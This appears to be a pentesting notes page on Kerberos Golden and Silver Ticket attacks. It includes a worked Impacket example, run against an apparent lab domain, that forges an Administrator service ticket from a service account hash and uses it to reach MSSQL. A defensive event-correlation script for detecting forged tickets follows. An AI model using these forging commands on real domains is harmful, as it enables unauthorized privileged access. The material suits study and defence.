Golden/Silver Ticket Attack

Overview

Both ticket attacks abuse a stolen account password hash: the Golden Ticket uses the hash of the krbtgt account, and the Silver Ticket uses the hash of a service account.

Golden Ticket Attack

The Golden Ticket Attack abuses the krbtgt account's password hash to forge Kerberos ticket-granting tickets (TGTs) as if they were issued by the KDC, and then uses them to access domain resources.

Once an adversary obtains the krbtgt account's password hash, they can

  • create a valid Kerberos TGT for any user in the domain and

  • manipulate that user’s PAC to gain additional privileges.

Tools

Labs

Silver Ticket Attack

Attackers who obtain the password hash of a service account can mint service-granting tickets for that service without ever contacting the KDC.

Tools

With a service account's password hash, we can mint a service-granting ticket offline, without interacting with the DC.

$ impacket-ticketer -nthash <password-hash> -domain-sid <domain-sid> -domain sequel.htb -dc-ip escape -spn MSSQL/DC.SEQUEL.HTB Administrator
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

We can use the saved ccache file to authenticate to the service later.

$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -k dc.sequel.htb
...
SQL> select suser_name()

--------------------
sequel\Administrator
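As an added defender-side example (not part of the original page or of Impacket), the following Python script turns the behaviour described above into a detection heuristic: a silver ticket reaches the service without any ticket request being logged at the DC, and a forged TGT lets a service ticket be requested without a prior TGT issuance. It correlates constructed Windows Security events (4768 TGT issued, 4769 service ticket issued, 4624 network logon via Kerberos); the host names, timestamps and sample records are assumptions.

```python
"""Heuristic detection of forged Kerberos tickets from consolidated
Windows Security events. All sample data below is constructed."""
from collections import defaultdict

# Constructed sample: DC events (4768 TGT issued, 4769 service ticket issued)
# and member-server events (4624 network logon, authentication package Kerberos).
SAMPLE_EVENTS = [
    {"id": 4768, "host": "DC01", "user": "alice", "time": 100},
    {"id": 4769, "host": "DC01", "user": "alice", "time": 101, "service": "MSSQL/DC.SEQUEL.HTB"},
    {"id": 4624, "host": "SQL01", "user": "alice", "time": 102, "auth": "Kerberos", "logon_type": 3},
    # No 4768/4769 for this account on the DC precedes the logon: silver-ticket pattern.
    {"id": 4624, "host": "SQL01", "user": "Administrator", "time": 200, "auth": "Kerberos", "logon_type": 3},
    # 4769 on the DC with no earlier 4768: a forged TGT was used to request a service ticket.
    {"id": 4769, "host": "DC01", "user": "bob", "time": 300, "service": "cifs/FS01"},
    {"id": 4624, "host": "FS01", "user": "bob", "time": 301, "auth": "Kerberos", "logon_type": 3},
]

WINDOW = 36000  # seconds; a legitimate TGT is commonly valid for about 10 hours


def find_forged_ticket_patterns(events, window=WINDOW):
    """Return a time-ordered list of (pattern, user, time) findings.

    possible_golden_ticket: 4769 on the DC with no 4768 for the user in the window.
    possible_silver_ticket: Kerberos network logon with no 4769 for the user in the window.
    """
    events = sorted(events, key=lambda e: e["time"])
    tgt_times = defaultdict(list)  # user -> times of 4768 seen on the DC
    tgs_times = defaultdict(list)  # user -> times of 4769 seen on the DC
    findings = []
    for e in events:
        user, t = e["user"].lower(), e["time"]
        if e["id"] == 4768:
            tgt_times[user].append(t)
        elif e["id"] == 4769:
            if not any(t - window <= x <= t for x in tgt_times[user]):
                findings.append(("possible_golden_ticket", user, t))
            tgs_times[user].append(t)
        elif e["id"] == 4624 and e.get("auth") == "Kerberos" and e.get("logon_type") == 3:
            if not any(t - window <= x <= t for x in tgs_times[user]):
                findings.append(("possible_silver_ticket", user, t))
    return findings


if __name__ == "__main__":
    for finding in find_forged_ticket_patterns(SAMPLE_EVENTS):
        print(finding)
```

The heuristic only works when events from every domain controller and the member servers are collected centrally; gaps in collection, long-lived cached tickets and TGT renewals will produce false positives, so treat hits as leads to triage rather than confirmed forgeries.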

Labs
